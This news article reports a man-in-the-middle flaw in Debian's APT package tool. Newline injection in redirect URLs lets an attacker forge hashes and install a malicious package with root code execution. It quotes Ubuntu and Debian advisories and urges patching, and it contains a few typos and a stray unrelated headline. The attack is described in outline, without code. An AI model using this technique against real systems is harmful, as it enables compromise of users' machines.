Critical vulnerability on Linux APT GET in Debian, Ubuntu and Mint distros

Author of Linux.Encoder Fails for the Third Time, Ransomware Is Still Decryptable

APT, one of the major Linux software installation programs, presents a serious security flaw

Users willing to install programs in Linux distributions such as Debian, Ubuntu, or Mint, usually resort to using the main software installation program known as the Advance Package Tool (APT). Although functional under appropriate circumstances, network security and ethical hacking experts from the International Institute of Cyber Security report the emergence of a method for deploying a Man-in-the-Middle attack on ATP. 

As if it wasn’t enough, the people in charge of this investigation believe that the security loophole would allow an attacker to execute arbitrary code on any system that installs any package.

According to experts in network security, APT is an interface for the dpkg packaging system. On the other hand, a packaging system is a ‘packages’ database that files require to install for a program, Firefox, for example, to run. With APT you can find and install new programs, update programs, delete programs and update local dbkg databases.

Everything sounds good so far, but the problems are about to begin. When APT installs a new program or updates one already installed, it does not check for problems with the Uniform Resource Identifier (URI) requested by a package. Instead, APT is limited to comparing the PGP security hashes returned by the URI Done response with the values of the signed package. Because the attacker controls the reported hashes, they can manipulate them to make a malicious package look legitimate.

In a security alert, Ubuntu mentions: “From the 0.8.15 version, APT decodes the destination URLs of redirects, but does not check for new lines, allowing a MiTM attacker to inject arbitrary headers into the returned result. If the URL embeds the hashes of the so-called file, it can be used to disable any validation of the downloaded file, because false hashes will be included in front of the correct hashes,” the Linux distribution notice concludes.

The investigators demonstrated that they could place a malicious .deb on a target system using the Release.gpg file. This file is always extracted during the APT upgrade and is usually installed in a predictable location, commented experts in network security.

On the other hand, Yves-Alexis Perez, a member of the Debian security team, said: “this vulnerability could be exploited using a Man-in-the-Middle attack between APT and a mirror to inject malicious content into the HTTP connection. This content could then be recognized as an APT-valid package to be finally used for code execution with root privileges on the compromised system.” 

The update patches for Debian and Ubuntu are already available, while the Mint distro has mentioned that their patches will be ready as soon as possible.

This vulnerability should not present problems for users as long as they update their systems accordingly. It is recommended to install updates as soon as possible, as it is highly probable that this vulnerability will be exploited in the wild, said experts in cybersecurity.